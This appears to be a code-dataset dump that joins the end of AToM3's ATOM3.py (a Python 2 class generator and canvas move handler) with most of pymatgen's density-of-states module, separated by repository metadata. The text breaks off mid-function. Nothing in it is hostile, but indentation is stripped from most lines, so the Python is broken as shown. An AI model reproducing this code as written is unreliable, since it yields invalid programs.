self.visitorOnAttributes( f, UMLobject, self.writeCreation)
# fill the 'generatedAttributes' dictionary
f.write(" self.generatedAttributes = {")
self.visitorOnAttributes( f, UMLobject, self.writeGeneratedDictionary)
f.write(" }\n")
# fill the 'realOrder' list
f.write(" self.realOrder = [")
self.visitorOnAttributes( f, UMLobject, self.writeRealOrderList)
f.write("]\n")
# fill the 'directEditing' list (Added 31 July 2002, by JL)
f.write(" self.directEditing = [")
self.visitorOnAttributes( f, UMLobject, self.writeDirectEditingList)
f.write("]\n")
#
# Generate the clone function
#
f.write(" def clone(self):\n")
if isGlobalModel != None: # we don't clone whole models!!
#f.write(" cloneObject = ASG_"+ UMLobject.keyword_.toString() +"( self.parent )\n")
#f.write(" cloneObject.listNodes = copy.copy(self.listNodes)\n")
f.write(" return self\n")
else:
f.write(" cloneObject = "+ UMLobject.keyword_.toString() +"( self.parent )\n")
f.write(" for atr in self.realOrder:\n")
f.write(" cloneObject.setAttrValue(atr, self.getAttrValue(atr).clone() )\n")
if self.theKeyword:
f.write(" cloneObject.keyword_ = cloneObject."+self.theKeyword+"\n")
if isGlobalModel == None:
f.write(" ASGNode.cloneActions(self, cloneObject)\n\n")
f.write(" return cloneObject\n") # changed 16 July 2002
#
# Generate the copy function
#
f.write(" def copy(self, other):\n")
f.write(" ATOM3Type.copy(self, other)\n")
f.write(" for atr in self.realOrder:\n")
f.write(" self.setAttrValue(atr, other.getAttrValue(atr) )\n")
if self.theKeyword:
f.write(" self.keyword_ = self."+self.theKeyword+"\n")
# only if the object is a descendant of ASGNode
if isGlobalModel == None:
f.write(" ASGNode.copy(self, other)\n\n")
# if we are an ASG class, must override the open() method from ATOM3Type
if isGlobalModel != None:
f.write(" def open(self, parent, topWindowParent):\n")
#f.write(" ATOM3Type.show(self, parent, topWindowParent)\n")
f.write(" from ATOM3 import *\n")
f.write(" a = ATOM3(topWindowParent, '"+UMLobject.keyword_.toString()+"', 0, 1, self)\n")
f.write(" #self.writeContents(a)\n")
f.write(" return a\n")
# Generate code for the constraints...
f.write(" def preCondition (self, actionID, * params):\n")
self.visitorOnConstraints ( "PREcondition", f, UMLobject, self.writeActionConstraint )
f.write(" if self.graphObject_:\n")
f.write(" return self.graphObject_.preCondition(actionID, params)\n")
f.write(" else: return None\n")
f.write(" def postCondition (self, actionID, * params):\n")
self.visitorOnConstraints ( "POSTcondition", f, UMLobject, self.writeActionConstraint )
f.write(" if self.graphObject_:\n")
f.write(" return self.graphObject_.postCondition(actionID, params)\n")
f.write(" else: return None\n")
self.visitorOnConstraints ( "", f, UMLobject, self.writeConstraintCode )
# Local methods to generate the actions code...
def writeActionCode ( file, value, unUsed):
""" Writes out the action code """
tempCode = value[4]
            if tempCode is None:
                return
            # strip all whitespace to check whether there is any actual code
            tempCode = tempCode.replace('\n', '')
            tempCode = tempCode.replace(' ', '')
            tempCode = tempCode.replace('\t', '')
            tempCode = tempCode.replace('\r', '')
            if tempCode != '':
file.write (" def "+value[0]+"(self, params):\n")
file.write (" "+string.replace(value[4],'\n', '\n '))
file.write ("\n\n")
def visitorOnActions ( which, file, UMLobject, function ):
""" Generates code for actions, in a 'visitor' pattern way """
for attr in UMLobject.generatedAttributes.keys():
type = UMLobject.generatedAttributes[attr] # A tuple with the types...
if( type[0] == 'ATOM3Action' ):
value = UMLobject.getAttrValue(attr).getValue() # obtain the value
function(file, value, which)
elif( type[0] == 'ATOM3List' and type[1] == 'ATOM3Action' ):
items = UMLobject.getAttrValue(attr).getValue()
for item in items:
value = item.getValue()
function(file, value, which)
def writeAction ( file, value, which):
""" Writes part of the function to evaluate local actions """
listAct, selAct = value[3]
listKnd, selKnd = value[2]
# Abort if there's no code...
            tempCode = value[4]
            if tempCode is None:
                return
            # strip all whitespace to check whether there is any actual code
            tempCode = tempCode.replace('\n', '')
            tempCode = tempCode.replace(' ', '')
            tempCode = tempCode.replace('\t', '')
            tempCode = tempCode.replace('\r', '')
            if len(tempCode) == 0:
                return
# Filter to make sure at least one actionID is selected
if( listKnd[selKnd] == which
and filter( lambda item: item == True, selAct ) ):
# iterate on the specified event...
file.write(" if actionID == ")
                count = 0
                written = 0
                for event in selAct:
                    if event == 1:
                        if not written:
                            file.write("self."+listAct[count])
                        else:
                            file.write(" or actionID == self."+listAct[count])
                        written = 1
                    count = count + 1
file.write(":\n")
file.write(" self."+value[0]+"(params)\n")
# Generate code for the actions... (added by Denis Feb 26,2005)
f.write(" def preAction (self, actionID, * params):\n")
visitorOnActions ( "PREaction", f, UMLobject, writeAction )
f.write(" if self.graphObject_:\n")
f.write(" return self.graphObject_.preAction(actionID, params)\n")
f.write(" else: return None\n")
f.write(" def postAction (self, actionID, * params):\n")
visitorOnActions ( "POSTaction", f, UMLobject, writeAction )
f.write(" if self.graphObject_:\n")
f.write(" return self.graphObject_.postAction(actionID, params)\n")
f.write(" else: return None\n")
visitorOnActions ( "", f, UMLobject, writeActionCode )
def moveBox (self, x, y):
"""
        Method to move a graphical node in the canvas; called by the mouseMove method.
"""
        sel = self.UMLmodel.find_withtag("selected") # find the selected 'box'
        if not sel: # nothing selected, nothing to move
            return
        tag = self.UMLmodel.gettags(sel[0])[0]
        if tag and VisualObj.Tag2ObjMap.has_key(tag):
# 1st. try the global constraints...
# modified 07-march-03: added x, y, initDragX, initDragY parameters
res = self.ASGroot.preCondition(ASG.MOVE, x, y, self.initDragX, self.initDragY) # evaluate global pre-conditions
if res: return self.undodrag(res)
obj = VisualObj.Tag2ObjMap[tag]
# modified 07-march-03: added x, y, initDragX, initDragY parameters
            res = obj.semanticObject.preCondition(ASG.MOVE, x, y, self.initDragX, self.initDragY) # evaluate local pre-conditions
if res: return self.undodrag(res)
# modified 07-march-03: added x, y, initDragX, initDragY parameters
self.ASGroot.preAction(ASG.MOVE, x, y, self.initDragX, self.initDragY) # execute global pre-actions
obj.semanticObject.preAction(ASG.MOVE, x, y, self.initDragX, self.initDragY) # execute local pre-actions
dx = x-self.initDragX # calculate the displacement in x and y
dy = y-self.initDragY
            obj.Move(dx, dy) # Move object (we do not care whether it is a link or an entity)
# modified 07-march-03: added x, y, initDragX, initDragY parameters
            res = self.ASGroot.postCondition(ASG.MOVE, x, y, self.initDragX, self.initDragY) # evaluate global post-conditions
if res: return self.undomovebox(res,dx,dy,sel,obj, tag)
# modified 07-march-03: added x, y, initDragX, initDragY parameters
            res = obj.semanticObject.postCondition(ASG.MOVE, x, y, self.initDragX, self.initDragY) # evaluate local post-conditions
if res: return self.undomovebox(res,dx,dy,sel,obj, tag)
# modified 07-march-03: added x, y, initDragX, initDragY parameters
self.ASGroot.postAction(ASG.MOVE, x, y, self.initDragX, self.initDragY) # execute global post-actions
obj.semanticObject.postAction(ASG.MOVE, x, y, self.initDragX, self.initDragY) # execute local post-actions
#
def undomovebox(self, res, dx, dy, sel, obj, tag):
"""
undoes an entity movement, due to a constraint failure...
"""
obj.Move(-dx, -dy)
return self.undodrag(res)
if __name__ == '__main__':
""" WARNING: This code isn't executed if the atom3.py bootup script is used! """
TkRoot = Tk()
TkRoot.configure(cursor='watch')
if len(sys.argv) == 1:
ATOM3(TkRoot, None , 1, 1) #.mainloop()
else:
ATOM3(TkRoot, sys.argv[1] , 1, 1) #.mainloop()
print "\nClosing AToM3 - A Tool for Multi-formalism and Meta-Modelling\n"
|
Balannen/LSMASOMM
|
atom3/Kernel/ATOM3.py
|
Python
|
gpl-3.0
| 249,434
|
[
"OpenMM",
"VisIt"
] |
11bc8b3da76dcfd80ecb3c37bb3bfb9a2dc454f2f5eaaa9a4f8b574da3ed22ba
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module defines classes to represent the density of states, etc.
"""
import functools
import warnings
from typing import Dict
import numpy as np
from monty.json import MSONable
from scipy.constants.codata import value as _cd
from pymatgen.core.periodic_table import get_el_sp
from pymatgen.core.sites import PeriodicSite
from pymatgen.core.spectrum import Spectrum
from pymatgen.core.structure import Structure
from pymatgen.electronic_structure.core import Orbital, Spin
from pymatgen.util.coord import get_linear_interpolated_value
from pymatgen.util.typing import ArrayLike, SpeciesLike
class DOS(Spectrum):
"""
Replacement basic DOS object. All other DOS objects are extended versions
of this object. Work in progress.
    .. attribute:: energies
        The sequence of energies
    .. attribute:: densities
        A dict of spin densities, e.g., {Spin.up: [...], Spin.down: [...]}
    .. attribute:: efermi
        Fermi level
"""
XLABEL = "Energy"
YLABEL = "Density"
def __init__(self, energies: ArrayLike, densities: ArrayLike, efermi: float):
"""
Args:
energies: A sequence of energies
            densities (ndarray): Either a Nx1 or a Nx2 array. If the former, it is
                interpreted as a Spin.up only density. Otherwise, the first column
                is interpreted as Spin.up and the other as Spin.down.
efermi: Fermi level energy.
"""
super().__init__(energies, densities, efermi)
self.efermi = efermi
def get_interpolated_gap(self, tol: float = 0.001, abs_tol: bool = False, spin: Spin = None):
"""
        Finds the interpolated band gap.
Args:
tol: tolerance in occupations for determining the gap
abs_tol: Set to True for an absolute tolerance and False for a
relative one.
spin: Possible values are None - finds the gap in the summed
densities, Up - finds the gap in the up spin channel,
Down - finds the gap in the down spin channel.
Returns:
(gap, cbm, vbm):
Tuple of floats in eV corresponding to the gap, cbm and vbm.
"""
if spin is None:
tdos = self.y if len(self.ydim) == 1 else np.sum(self.y, axis=1)
elif spin == Spin.up:
tdos = self.y[:, 0]
else:
tdos = self.y[:, 1]
if not abs_tol:
tol = tol * tdos.sum() / tdos.shape[0] # type: ignore
energies = self.x
below_fermi = [i for i in range(len(energies)) if energies[i] < self.efermi and tdos[i] > tol]
above_fermi = [i for i in range(len(energies)) if energies[i] > self.efermi and tdos[i] > tol]
vbm_start = max(below_fermi)
cbm_start = min(above_fermi)
if vbm_start == cbm_start:
return 0.0, self.efermi, self.efermi
# Interpolate between adjacent values
terminal_dens = tdos[vbm_start : vbm_start + 2][::-1]
terminal_energies = energies[vbm_start : vbm_start + 2][::-1]
start = get_linear_interpolated_value(terminal_dens, terminal_energies, tol)
terminal_dens = tdos[cbm_start - 1 : cbm_start + 1]
terminal_energies = energies[cbm_start - 1 : cbm_start + 1]
end = get_linear_interpolated_value(terminal_dens, terminal_energies, tol)
return end - start, end, start
def get_cbm_vbm(self, tol: float = 0.001, abs_tol: bool = False, spin=None):
"""
        Finds the conduction band minimum (cbm) and valence band maximum (vbm).
        Args:
            tol: tolerance in occupations for determining the gap
            abs_tol: Set to True for an absolute tolerance and False for a
                relative one.
            spin: Possible values are None - finds the gap in the summed
                densities, Up - finds the gap in the up spin channel,
                Down - finds the gap in the down spin channel.
        Returns:
            (cbm, vbm): Floats in eV corresponding to the cbm and vbm.
"""
# determine tolerance
if spin is None:
tdos = self.y if len(self.ydim) == 1 else np.sum(self.y, axis=1)
elif spin == Spin.up:
tdos = self.y[:, 0]
else:
tdos = self.y[:, 1]
if not abs_tol:
tol = tol * tdos.sum() / tdos.shape[0] # type: ignore
# find index of fermi energy
i_fermi = 0
while self.x[i_fermi] <= self.efermi:
i_fermi += 1
# work backwards until tolerance is reached
i_gap_start = i_fermi
while i_gap_start - 1 >= 0 and tdos[i_gap_start - 1] <= tol:
i_gap_start -= 1
# work forwards until tolerance is reached
i_gap_end = i_gap_start
while i_gap_end < tdos.shape[0] and tdos[i_gap_end] <= tol:
i_gap_end += 1
i_gap_end -= 1
return self.x[i_gap_end], self.x[i_gap_start]
def get_gap(self, tol: float = 0.001, abs_tol: bool = False, spin: Spin = None):
"""
        Finds the band gap.
        Args:
            tol: tolerance in occupations for determining the gap
            abs_tol: Set to True for an absolute tolerance and False for a
                relative one.
spin: Possible values are None - finds the gap in the summed
densities, Up - finds the gap in the up spin channel,
Down - finds the gap in the down spin channel.
Returns:
gap in eV
"""
(cbm, vbm) = self.get_cbm_vbm(tol, abs_tol, spin)
return max(cbm - vbm, 0.0)
def __str__(self):
"""
Returns a string which can be easily plotted (using gnuplot).
"""
if Spin.down in self.densities:
stringarray = ["#{:30s} {:30s} {:30s}".format("Energy", "DensityUp", "DensityDown")]
for i, energy in enumerate(self.energies):
stringarray.append(
"{:.5f} {:.5f} {:.5f}".format(energy, self.densities[Spin.up][i], self.densities[Spin.down][i])
)
else:
stringarray = ["#{:30s} {:30s}".format("Energy", "DensityUp")]
for i, energy in enumerate(self.energies):
stringarray.append("{:.5f} {:.5f}".format(energy, self.densities[Spin.up][i]))
return "\n".join(stringarray)
class Dos(MSONable):
"""
Basic DOS object. All other DOS objects are extended versions of this
object.
    .. attribute:: energies
        The sequence of energies
    .. attribute:: densities
        A dict of spin densities, e.g., {Spin.up: [...], Spin.down: [...]}
    .. attribute:: efermi
        Fermi level
"""
def __init__(self, efermi: float, energies: ArrayLike, densities: Dict[Spin, ArrayLike]):
"""
Args:
efermi: Fermi level energy
            energies: A sequence of energies
densities ({Spin: np.array}): representing the density of states
for each Spin.
"""
self.efermi = efermi
self.energies = np.array(energies)
self.densities = {k: np.array(d) for k, d in densities.items()}
def get_densities(self, spin: Spin = None):
"""
Returns the density of states for a particular spin.
Args:
spin: Spin
Returns:
Returns the density of states for a particular spin. If Spin is
None, the sum of all spins is returned.
"""
if self.densities is None:
result = None
elif spin is None:
if Spin.down in self.densities:
result = self.densities[Spin.up] + self.densities[Spin.down]
else:
result = self.densities[Spin.up]
else:
result = self.densities[spin]
return result
def get_smeared_densities(self, sigma: float):
"""
Returns the Dict representation of the densities, {Spin: densities},
but with a Gaussian smearing of std dev sigma applied about the fermi
level.
Args:
sigma: Std dev of Gaussian smearing function.
Returns:
Dict of Gaussian-smeared densities.
"""
from scipy.ndimage.filters import gaussian_filter1d
smeared_dens = {}
        avgdiff = np.mean(np.diff(self.energies)) # average energy spacing
for spin, dens in self.densities.items():
smeared_dens[spin] = gaussian_filter1d(dens, sigma / avgdiff)
return smeared_dens
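    # A minimal usage sketch (hedged; assumes a Dos instance `dos` built on a
    # uniform energy grid): a 0.1 eV Gaussian broadening of the densities is
    # obtained with
    #   smeared = dos.get_smeared_densities(0.1)
    #   broadened = Dos(dos.efermi, dos.energies, smeared)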
def __add__(self, other):
"""
Adds two DOS together. Checks that energy scales are the same.
Otherwise, a ValueError is thrown.
Args:
other: Another DOS object.
Returns:
Sum of the two DOSs.
"""
if not all(np.equal(self.energies, other.energies)):
raise ValueError("Energies of both DOS are not compatible!")
densities = {spin: self.densities[spin] + other.densities[spin] for spin in self.densities.keys()}
return Dos(self.efermi, self.energies, densities)
def get_interpolated_value(self, energy: float):
"""
Returns interpolated density for a particular energy.
Args:
energy: Energy to return the density for.
"""
f = {}
for spin in self.densities.keys():
f[spin] = get_linear_interpolated_value(self.energies, self.densities[spin], energy)
return f
def get_interpolated_gap(self, tol: float = 0.001, abs_tol: bool = False, spin: Spin = None):
"""
        Finds the interpolated band gap.
Args:
tol: tolerance in occupations for determining the gap
abs_tol: Set to True for an absolute tolerance and False for a
relative one.
spin: Possible values are None - finds the gap in the summed
densities, Up - finds the gap in the up spin channel,
Down - finds the gap in the down spin channel.
Returns:
(gap, cbm, vbm):
Tuple of floats in eV corresponding to the gap, cbm and vbm.
"""
tdos = self.get_densities(spin)
if not abs_tol:
tol = tol * tdos.sum() / tdos.shape[0]
energies = self.energies
below_fermi = [i for i in range(len(energies)) if energies[i] < self.efermi and tdos[i] > tol]
above_fermi = [i for i in range(len(energies)) if energies[i] > self.efermi and tdos[i] > tol]
vbm_start = max(below_fermi)
cbm_start = min(above_fermi)
if vbm_start == cbm_start:
return 0.0, self.efermi, self.efermi
# Interpolate between adjacent values
terminal_dens = tdos[vbm_start : vbm_start + 2][::-1]
terminal_energies = energies[vbm_start : vbm_start + 2][::-1]
start = get_linear_interpolated_value(terminal_dens, terminal_energies, tol)
terminal_dens = tdos[cbm_start - 1 : cbm_start + 1]
terminal_energies = energies[cbm_start - 1 : cbm_start + 1]
end = get_linear_interpolated_value(terminal_dens, terminal_energies, tol)
return end - start, end, start
def get_cbm_vbm(self, tol: float = 0.001, abs_tol: bool = False, spin: Spin = None):
"""
        Finds the conduction band minimum (cbm) and valence band maximum (vbm).
        Args:
            tol: tolerance in occupations for determining the gap
            abs_tol: Set to True for an absolute tolerance and False for a
                relative one.
            spin: Possible values are None - finds the gap in the summed
                densities, Up - finds the gap in the up spin channel,
                Down - finds the gap in the down spin channel.
        Returns:
            (cbm, vbm): Floats in eV corresponding to the cbm and vbm.
"""
# determine tolerance
tdos = self.get_densities(spin)
if not abs_tol:
tol = tol * tdos.sum() / tdos.shape[0]
# find index of fermi energy
i_fermi = 0
while self.energies[i_fermi] <= self.efermi:
i_fermi += 1
# work backwards until tolerance is reached
i_gap_start = i_fermi
while i_gap_start - 1 >= 0 and tdos[i_gap_start - 1] <= tol:
i_gap_start -= 1
# work forwards until tolerance is reached
i_gap_end = i_gap_start
while i_gap_end < tdos.shape[0] and tdos[i_gap_end] <= tol:
i_gap_end += 1
i_gap_end -= 1
return self.energies[i_gap_end], self.energies[i_gap_start]
def get_gap(self, tol: float = 0.001, abs_tol: bool = False, spin: Spin = None):
"""
        Finds the band gap.
        Args:
            tol: tolerance in occupations for determining the gap
            abs_tol: Set to True for an absolute tolerance and False for a
                relative one.
spin: Possible values are None - finds the gap in the summed
densities, Up - finds the gap in the up spin channel,
Down - finds the gap in the down spin channel.
Returns:
gap in eV
"""
(cbm, vbm) = self.get_cbm_vbm(tol, abs_tol, spin)
return max(cbm - vbm, 0.0)
def __str__(self):
"""
Returns a string which can be easily plotted (using gnuplot).
"""
if Spin.down in self.densities:
stringarray = ["#{:30s} {:30s} {:30s}".format("Energy", "DensityUp", "DensityDown")]
for i, energy in enumerate(self.energies):
stringarray.append(
"{:.5f} {:.5f} {:.5f}".format(energy, self.densities[Spin.up][i], self.densities[Spin.down][i])
)
else:
stringarray = ["#{:30s} {:30s}".format("Energy", "DensityUp")]
for i, energy in enumerate(self.energies):
stringarray.append("{:.5f} {:.5f}".format(energy, self.densities[Spin.up][i]))
return "\n".join(stringarray)
@classmethod
def from_dict(cls, d) -> "Dos":
"""
Returns Dos object from dict representation of Dos.
"""
return Dos(
d["efermi"],
d["energies"],
{Spin(int(k)): v for k, v in d["densities"].items()},
)
def as_dict(self) -> dict:
"""
Json-serializable dict representation of Dos.
"""
return {
"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"efermi": self.efermi,
"energies": self.energies.tolist(),
"densities": {str(spin): dens.tolist() for spin, dens in self.densities.items()},
}
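# A minimal usage sketch for the Dos class (hedged: the numbers below are
# made up for illustration). It builds a toy spin-up-only DOS with a gap
# around the Fermi level and queries it through the public API.
def _dos_usage_sketch():
    energies = np.linspace(-5, 5, 101)
    dens = np.where(np.abs(energies) > 1.0, 1.0, 0.0) # toy ~2 eV gap
    dos = Dos(efermi=0.0, energies=energies, densities={Spin.up: dens})
    gap = dos.get_gap() # expected to be close to 2 eV
    gap_interp, cbm, vbm = dos.get_interpolated_gap()
    return gap, gap_interp, cbm, vbm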
class FermiDos(Dos, MSONable):
"""
This wrapper class helps relate the density of states, doping levels
(i.e. carrier concentrations) and corresponding fermi levels. A negative
doping concentration indicates the majority carriers are electrons
(n-type doping); a positive doping concentration indicates holes are the
majority carriers (p-type doping).
"""
def __init__(
self,
dos: Dos,
structure: Structure = None,
nelecs: float = None,
bandgap: float = None,
):
"""
Args:
dos: Pymatgen Dos object.
structure: A structure. If not provided, the structure
of the dos object will be used. If the dos does not have an
associated structure object, an error will be thrown.
nelecs: The number of electrons included in the energy range of
dos. It is used for normalizing the densities. Default is the total
number of electrons in the structure.
bandgap: If set, the energy values are scissored so that the electronic
band gap matches this value.
"""
super().__init__(
dos.efermi,
energies=dos.energies,
densities={k: np.array(d) for k, d in dos.densities.items()},
)
if structure is None:
if hasattr(dos, "structure"):
structure = dos.structure
else:
raise ValueError("Structure object is not provided and not " "present in dos")
self.structure = structure
self.nelecs = nelecs or self.structure.composition.total_electrons
self.volume = self.structure.volume
self.energies = np.array(dos.energies)
self.de = np.hstack((self.energies[1:], self.energies[-1])) - self.energies
# normalize total density of states based on integral at 0K
tdos = np.array(self.get_densities())
self.tdos = tdos * self.nelecs / (tdos * self.de)[self.energies <= self.efermi].sum()
ecbm, evbm = self.get_cbm_vbm()
self.idx_vbm = int(np.argmin(abs(self.energies - evbm)))
self.idx_cbm = int(np.argmin(abs(self.energies - ecbm)))
self.A_to_cm = 1e-8
if bandgap:
if evbm < self.efermi < ecbm:
eref = self.efermi
else:
eref = (evbm + ecbm) / 2.0
idx_fermi = int(np.argmin(abs(self.energies - eref)))
if idx_fermi == self.idx_vbm:
# Fermi level and vbm should be different indices
idx_fermi += 1
self.energies[:idx_fermi] -= (bandgap - (ecbm - evbm)) / 2.0
self.energies[idx_fermi:] += (bandgap - (ecbm - evbm)) / 2.0
def get_doping(self, fermi_level: float, temperature: float) -> float:
"""
Calculate the doping (majority carrier concentration) at a given
        fermi level and temperature. A simple left Riemann sum is used to
        integrate the density of states over energy, weighted by the
        equilibrium Fermi-Dirac distribution.
Args:
            fermi_level: The fermi level in eV.
temperature: The temperature in Kelvin.
Returns:
            The doping concentration in units of 1/cm^3. Negative values
            indicate that the majority carriers are electrons (n-type doping)
            whereas positive values indicate that the majority carriers are
            holes (p-type doping).
"""
cb_integral = np.sum(
self.tdos[self.idx_cbm :]
* f0(self.energies[self.idx_cbm :], fermi_level, temperature)
* self.de[self.idx_cbm :],
axis=0,
)
vb_integral = np.sum(
self.tdos[: self.idx_vbm + 1]
* (1 - f0(self.energies[: self.idx_vbm + 1], fermi_level, temperature))
* self.de[: self.idx_vbm + 1],
axis=0,
)
return (vb_integral - cb_integral) / (self.volume * self.A_to_cm ** 3)
def get_fermi_interextrapolated(
self, concentration: float, temperature: float, warn: bool = True, c_ref: float = 1e10, **kwargs
) -> float:
"""
Similar to get_fermi except that when get_fermi fails to converge,
an interpolated or extrapolated fermi is returned with the assumption
that the fermi level changes linearly with log(abs(concentration)).
Args:
concentration: The doping concentration in 1/cm^3. Negative values
represent n-type doping and positive values represent p-type
doping.
temperature: The temperature in Kelvin.
warn: Whether to give a warning the first time the fermi cannot be
found.
c_ref: A doping concentration where get_fermi returns a
value without error for both c_ref and -c_ref.
**kwargs: Keyword arguments passed to the get_fermi function.
Returns:
The Fermi level. Note, the value is possibly interpolated or
extrapolated and must be used with caution.
"""
try:
return self.get_fermi(concentration, temperature, **kwargs)
except ValueError as e:
if warn:
warnings.warn(str(e))
if abs(concentration) < c_ref:
if abs(concentration) < 1e-10:
concentration = 1e-10
# max(10, ) is to avoid log(0<x<1) and log(1+x) both of which
# are slow
f2 = self.get_fermi_interextrapolated(
max(10, abs(concentration) * 10.0), temperature, warn=False, **kwargs
)
f1 = self.get_fermi_interextrapolated(
-max(10, abs(concentration) * 10.0), temperature, warn=False, **kwargs
)
c2 = np.log(abs(1 + self.get_doping(f2, temperature)))
c1 = -np.log(abs(1 + self.get_doping(f1, temperature)))
slope = (f2 - f1) / (c2 - c1)
return f2 + slope * (np.sign(concentration) * np.log(abs(1 + concentration)) - c2)
f_ref = self.get_fermi_interextrapolated(np.sign(concentration) * c_ref, temperature, warn=False, **kwargs)
f_new = self.get_fermi_interextrapolated(concentration / 10.0, temperature, warn=False, **kwargs)
clog = np.sign(concentration) * np.log(abs(concentration))
c_newlog = np.sign(concentration) * np.log(abs(self.get_doping(f_new, temperature)))
slope = (f_new - f_ref) / (c_newlog - np.sign(concentration) * 10.0)
return f_new + slope * (clog - c_newlog)
def get_fermi(
self,
concentration: float,
temperature: float,
rtol: float = 0.01,
nstep: int = 50,
step: float = 0.1,
precision: int = 8,
):
"""
Finds the fermi level at which the doping concentration at the given
temperature (T) is equal to concentration. A greedy algorithm is used
where the relative error is minimized by calculating the doping at a
grid which continually becomes finer.
Args:
concentration: The doping concentration in 1/cm^3. Negative values
represent n-type doping and positive values represent p-type
doping.
temperature: The temperature in Kelvin.
rtol: The maximum acceptable relative error.
            nstep: The number of steps checked around a given fermi level.
            step: Initial step in energy when searching for the Fermi level.
            precision: Essentially the number of decimal places of the
                calculated Fermi level.
        Returns:
            The fermi level in eV. Note that this is different from the
            default dos.efermi.
"""
fermi = self.efermi # initialize target fermi
relative_error = [float("inf")]
for _ in range(precision):
frange = np.arange(-nstep, nstep + 1) * step + fermi
calc_doping = np.array([self.get_doping(f, temperature) for f in frange])
relative_error = np.abs(calc_doping / concentration - 1.0)
fermi = frange[np.argmin(relative_error)]
step /= 10.0
if min(relative_error) > rtol:
raise ValueError("Could not find fermi within {}% of concentration={}".format(rtol * 100, concentration))
return fermi
@classmethod
def from_dict(cls, d) -> "FermiDos":
"""
Returns Dos object from dict representation of Dos.
"""
dos = Dos(
d["efermi"],
d["energies"],
{Spin(int(k)): v for k, v in d["densities"].items()},
)
return FermiDos(dos, structure=Structure.from_dict(d["structure"]), nelecs=d["nelecs"])
def as_dict(self) -> dict:
"""
Json-serializable dict representation of Dos.
"""
return {
"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"efermi": self.efermi,
"energies": self.energies.tolist(),
"densities": {str(spin): dens.tolist() for spin, dens in self.densities.items()},
"structure": self.structure,
"nelecs": self.nelecs,
}
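# A hedged usage sketch for FermiDos (assumes `dos_with_structure` is a Dos
# that carries an associated structure, e.g. one read from a VASP run):
# solve for the Fermi level that yields a given doping at 300 K.
def _fermi_dos_usage_sketch(dos_with_structure):
    fdos = FermiDos(dos_with_structure)
    # n-type doping of 1e18 cm^-3 (negative sign: electrons are majority)
    ef = fdos.get_fermi_interextrapolated(-1e18, temperature=300)
    n = fdos.get_doping(ef, temperature=300) # should be close to -1e18
    return ef, n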
class CompleteDos(Dos):
"""
This wrapper class defines a total dos, and also provides a list of PDos.
Mainly used by pymatgen.io.vasp.Vasprun to create a complete Dos from
a vasprun.xml file. You are unlikely to try to generate this object
manually.
.. attribute:: structure
Structure associated with the CompleteDos.
.. attribute:: pdos
Dict of partial densities of the form {Site:{Orbital:{Spin:Densities}}}
"""
def __init__(
self, structure: Structure, total_dos: Dos, pdoss: Dict[PeriodicSite, Dict[Orbital, Dict[Spin, ArrayLike]]]
):
"""
Args:
structure: Structure associated with this particular DOS.
total_dos: total Dos for structure
            pdoss: The pdoss are supplied as a {Site: {Orbital: {Spin:
                Densities}}} dict.
"""
super().__init__(
total_dos.efermi,
energies=total_dos.energies,
densities={k: np.array(d) for k, d in total_dos.densities.items()},
)
self.pdos = pdoss
self.structure = structure
def get_site_orbital_dos(self, site: PeriodicSite, orbital: Orbital) -> Dos:
"""
Get the Dos for a particular orbital of a particular site.
Args:
site: Site in Structure associated with CompleteDos.
orbital: Orbital in the site.
Returns:
Dos containing densities for orbital of site.
"""
return Dos(self.efermi, self.energies, self.pdos[site][orbital])
def get_site_dos(self, site: PeriodicSite) -> Dos:
"""
Get the total Dos for a site (all orbitals).
Args:
site: Site in Structure associated with CompleteDos.
Returns:
Dos containing summed orbital densities for site.
"""
site_dos = functools.reduce(add_densities, self.pdos[site].values())
return Dos(self.efermi, self.energies, site_dos)
def get_site_spd_dos(self, site: PeriodicSite) -> Dict[Orbital, Dos]:
"""
Get orbital projected Dos of a particular site
Args:
site: Site in Structure associated with CompleteDos.
Returns:
dict of {orbital: Dos}, e.g. {"s": Dos object, ...}
"""
spd_dos: Dict[Orbital, Dict[Spin, ArrayLike]] = dict()
for orb, pdos in self.pdos[site].items():
orbital_type = _get_orb_type(orb)
if orbital_type in spd_dos:
spd_dos[orbital_type] = add_densities(spd_dos[orbital_type], pdos)
else:
spd_dos[orbital_type] = pdos
return {orb: Dos(self.efermi, self.energies, densities) for orb, densities in spd_dos.items()}
def get_site_t2g_eg_resolved_dos(self, site: PeriodicSite) -> Dict[str, Dos]:
"""
Get the t2g, eg projected DOS for a particular site.
Args:
site: Site in Structure associated with CompleteDos.
Returns:
A dict {"e_g": Dos, "t2g": Dos} containing summed e_g and t2g DOS
for the site.
"""
t2g_dos = []
eg_dos = []
for s, atom_dos in self.pdos.items():
if s == site:
for orb, pdos in atom_dos.items():
if orb in (Orbital.dxy, Orbital.dxz, Orbital.dyz):
t2g_dos.append(pdos)
elif orb in (Orbital.dx2, Orbital.dz2):
eg_dos.append(pdos)
return {
"t2g": Dos(self.efermi, self.energies, functools.reduce(add_densities, t2g_dos)),
"e_g": Dos(self.efermi, self.energies, functools.reduce(add_densities, eg_dos)),
}
def get_spd_dos(self) -> Dict[Orbital, Dos]:
"""
Get orbital projected Dos.
Returns:
dict of {orbital: Dos}, e.g. {"s": Dos object, ...}
"""
spd_dos = {}
for atom_dos in self.pdos.values():
for orb, pdos in atom_dos.items():
orbital_type = _get_orb_type(orb)
if orbital_type not in spd_dos:
spd_dos[orbital_type] = pdos
else:
spd_dos[orbital_type] = add_densities(spd_dos[orbital_type], pdos)
return {orb: Dos(self.efermi, self.energies, densities) for orb, densities in spd_dos.items()}
def get_element_dos(self) -> Dict[SpeciesLike, Dos]:
"""
Get element projected Dos.
Returns:
dict of {Element: Dos}
"""
el_dos = {}
for site, atom_dos in self.pdos.items():
el = site.specie
for pdos in atom_dos.values():
if el not in el_dos:
el_dos[el] = pdos
else:
el_dos[el] = add_densities(el_dos[el], pdos)
return {el: Dos(self.efermi, self.energies, densities) for el, densities in el_dos.items()}
def get_element_spd_dos(self, el: SpeciesLike) -> Dict[Orbital, Dos]:
"""
Get element and spd projected Dos
Args:
el: Element in Structure.composition associated with CompleteDos
        Returns:
            dict of {OrbitalType: Dos} for the given element, e.g.
            {OrbitalType.s: Dos, OrbitalType.p: Dos, OrbitalType.d: Dos}
"""
el = get_el_sp(el)
el_dos = {}
for site, atom_dos in self.pdos.items():
if site.specie == el:
for orb, pdos in atom_dos.items():
orbital_type = _get_orb_type(orb)
if orbital_type not in el_dos:
el_dos[orbital_type] = pdos
else:
